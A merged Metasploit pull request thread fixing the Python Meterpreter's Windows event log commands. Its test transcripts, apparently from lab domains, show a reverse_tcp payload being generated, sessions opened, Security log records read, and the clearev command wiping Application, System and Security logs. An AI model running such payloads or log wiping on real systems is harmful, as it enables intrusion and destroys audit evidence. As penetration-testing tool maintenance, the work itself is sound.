### PR TITLE
Fix Python EventLog commands

### PR DESCRIPTION
**Pull request by zeroSteiner**
The Python Meterpreter's `stdapi_sys_eventlog` commands had multiple issues. This fixes all of the issues I noticed, so that the event logs can be read on Python 2 and Python 3. This was notably breaking the `clearev` Meterpreter command.

I don't see where the `#read_forwards` method that calls `stdapi_sys_eventlog_read` is referenced by a command, so the easiest way to test it is using Pry. 

# Testing

- [ ] Establish a Python Meterpreter session (test a 2.x and 3.x version)
- [ ] From pry, initialize a log object to test opening a log (run: `log = self.sys.eventlog.open('Security')`)
- [ ] Check the length of the object to test `stdapi_sys_eventlog_numrecords` (run: `log.length`)
- [ ] Check the oldest record to test `stdapi_sys_eventlog_oldest` (run: `log.oldest`)
- [ ] Check reading a record to test `stdapi_sys_eventlog_read` (run: `log.read_forwards`)
- [ ] Check that clearing logs work, from the Meterpreter prompt run the `clearev` command. See that there are now no event logs. This command requires privileges to run.

# Demo

```
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x00007fdefc9bc890>:0x00007fdf1908a4a8 @client=#<Session:meterpreter 192.168.159.10:56257 (192.168.159.10) "MSFLAB\smcintyre @ DC">, @handle=2121989160968>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 1208
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 143414
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x00007fdf195ba8d8
 @category=104,
 @data="",
 @eventid=1102,
 @generated=2022-11-11 17:37:49 -0500,
 @num=143414,
 @strings=["S-1-5-21-3402587289-1488798532-3618296993-1000", "smcintyre", "MSFLAB", "0x580f0a"],
 @type=8,
 @written=2022-11-11 17:37:49 -0500>
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.close
=> nil
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[*] Wiping 48 records from Application...
[*] Wiping 266 records from System...
[*] Wiping 1214 records from Security...
meterpreter > 
```

<details>
<summary>Broken demo</summary>

Prior to these changes these were the errors for the same workflow.

```
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x00007fdf19b726e0>:0x00007fdf197120f0 @client=#<Session:meterpreter 192.168.159.10:56273 (192.168.159.10) "MSFLAB\smcintyre @ DC">, @handle=26869768>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
Rex::Post::Meterpreter::RequestError: stdapi_sys_eventlog_numrecords: Operation failed: Windows error: The handle is invalid.
from /home/smcintyre/Repositories/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb:80:in `length'
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
Rex::Post::Meterpreter::RequestError: stdapi_sys_eventlog_oldest: Operation failed: Python exception: AttributeError
from /home/smcintyre/Repositories/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb:157:in `oldest'
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
Rex::Post::Meterpreter::RequestError: stdapi_sys_eventlog_read: Operation failed: Windows error: The handle is invalid.
from /home/smcintyre/Repositories/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb:95:in `_read'
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[-] stdapi_sys_eventlog_numrecords: Operation failed: Windows error: The handle is invalid.
meterpreter >
```
</details>

### CODE REVIEW

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
With initial before testing this isn't working at all on Python 2.7.18:

```
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> self.sys.eventlog.open('Security')
Rex::Post::Meterpreter::RequestError: stdapi_sys_eventlog_open: Operation failed: The command is not supported by this Meterpreter type (python/linux)
from /home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:213:in `send_packet_wait_response'
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> 
```

And with Python 3.10.6 here were the results, which appear to be the same:

```
[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
Rex::Post::Meterpreter::RequestError: stdapi_sys_eventlog_open: Operation failed: The command is not supported by this Meterpreter type (python/linux)
from /home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:213:in `send_packet_wait_response'
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> 
```

**Comment by zeroSteiner** [comment]
From looking at `The command is not supported by this Meterpreter type (python/linux)` it looks like you're testing on Linux. This will need to be tested on Windows using Python because the Eventlog functionality is only available on Windows. The commands will never be registered on non-Windows systems because the API isn't available.

**Comment by gwillcox-r7** [comment]
> From looking at `The command is not supported by this Meterpreter type (python/linux)` it looks like you're testing on Linux. This will need to be tested on Windows using Python because the Eventlog functionality is only available on Windows. The commands will never be registered on non-Windows systems because the API isn't available.

Thanks the testing directions just said get a shell on a Python 2.x or 3.x session and didn't specify the host so assumed it would work on either from that information provided. I'll try this on a Windows host instead to confirm.

**Comment by gwillcox-r7** [comment]
Seems to be working well on Python 3.11.1:

```
msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
[*] Writing 436 bytes to reverse.py...
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.153.128:4444 
msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24380 bytes) to 192.168.153.1
WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x0000564a0e309f90>:0x0000564a0e07a6a8
 @client=#<Session:meterpreter 192.168.153.1:50334 (192.168.153.1) "DAFOREST\Administrator @ WIN-BR0CCBA815B">,
 @handle=1930110602624>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 181147
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 3480926
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x0000564a0e3c14b0
 @category=12545,
 @data="",
 @eventid=4634,
 @generated=2022-12-09 08:07:49 -0600,
 @num=3480926,
 @strings=["S-1-5-18", "WIN-BR0CCBA815B$", "DAFOREST", "0x82dcaae", "3"],
 @type=8,
 @written=2022-12-09 08:07:49 -0600>
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.close
=> nil
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.close
=> nil
[7] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[*] Wiping 484 records from Application...
[*] Wiping 48335 records from System...
[*] Wiping 181141 records from Security...
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x0000564a0e309f90>:0x00007f23dd008ba8
 @client=#<Session:meterpreter 192.168.153.1:50334 (192.168.153.1) "DAFOREST\Administrator @ WIN-BR0CCBA815B">,
 @handle=1930110601952>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 89
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x0000564a0d4b8248
 @category=104,
 @data="",
 @eventid=1102,
 @generated=2022-12-13 12:52:19 -0600,
 @num=3662159,
 @strings=["S-1-5-21-3290009963-1772292745-3260174523-500", "Administrator", "DAFOREST", "0xfe5f96"],
 @type=8,
 @written=2022-12-13 12:52:19 -0600>
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x0000564a0d6896f8
 @category=12545,
 @data="",
 @eventid=4634,
 @generated=2022-12-13 12:52:19 -0600,
 @num=3662160,
 @strings=["S-1-5-18", "WIN-BR0CCBA815B$", "DAFOREST", "0x10483d5", "3"],
 @type=8,
 @written=2022-12-13 12:52:19 -0600>
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x0000564a0d7a11f8
 @category=12545,
 @data="",
 @eventid=4634,
 @generated=2022-12-13 12:52:19 -0600,
 @num=3662161,
 @strings=["S-1-5-18", "WIN-BR0CCBA815B$", "DAFOREST", "0x10483d4", "3"],
 @type=8,
 @written=2022-12-13 12:52:19 -0600>
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.close
=> nil
[7] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[*] Wiping 38 records from Application...
[*] Wiping 3 records from System...
[*] Wiping 167 records from Security...
meterpreter > 
```

**Comment by gwillcox-r7** [comment]
Also seems to be working well in Python 2.7.17 which is now EOL (Python 2.7.x support was dropped in 2020 as noted at https://devguide.python.org/versions/#versions).

```
msf6 payload(python/meterpreter/reverse_tcp) > 
[*] Sending stage (24380 bytes) to 192.168.153.1
[*] Meterpreter session 2 opened (192.168.153.128:4444 -> 192.168.153.1:50355) at 2022-12-13 12:54:45 -0600

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x0000564a0dbca928>:0x00007f23dcaa2150
 @client=#<Session:meterpreter 192.168.153.1:50355 (192.168.153.1) "DAFOREST\Administrator @ WIN-BR0CCBA815B">,
 @handle=22769120>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 202
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 3662534
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x00007f23dcfc84e0
 @category=104,
 @data="",
 @eventid=1102,
 @generated=2022-12-13 12:54:10 -0600,
 @num=3662534,
 @strings=["S-1-5-21-3290009963-1772292745-3260174523-500", "Administrator", "DAFOREST", "0xfe5f96"],
 @type=8,
 @written=2022-12-13 12:54:10 -0600>
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[*] Wiping 7 records from Application...
[*] Wiping 2 records from System...
[*] Wiping 230 records from Security...
meterpreter > clearev
[*] Wiping 0 records from Application...
[*] Wiping 2 records from System...
[*] Wiping 14 records from Security...
meterpreter > clearev
[*] Wiping 0 records from Application...
[*] Wiping 2 records from System...
[*] Wiping 1 records from Security...
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log = self.sys.eventlog.open('Security')
=> #<#<Class:0x0000564a0dbca928>:0x0000564a0efb9e48
 @client=#<Session:meterpreter 192.168.153.1:50355 (192.168.153.1) "DAFOREST\Administrator @ WIN-BR0CCBA815B">,
 @handle=22771424>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 3662779
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 3662779
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.read_forwards
=> #<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::EventLogSubsystem::EventRecord:0x0000564a08b14b28
 @category=104,
 @data="",
 @eventid=1102,
 @generated=2022-12-13 12:55:37 -0600,
 @num=3662779,
 @strings=["S-1-5-21-3290009963-1772292745-3260174523-500", "Administrator", "DAFOREST", "0xfe5f96"],
 @type=8,
 @written=2022-12-13 12:55:37 -0600>
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.oldest
=> 3662779
[6] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 108
[7] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 110
[8] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 110
[9] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 115
[10] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 144
[11] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 148
[12] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 148
[13] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 148
[14] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 148
[15] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> log.length
=> 148
[16] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> exit
meterpreter > clearev
[*] Wiping 0 records from Application...
[*] Wiping 3 records from System...
[*] Wiping 151 records from Security...
meterpreter > 
```

**Comment by gwillcox-r7** [comment]
Change look good to me, will land this shortly and then put up a PR to bump the payload version.

**Pull request merged**
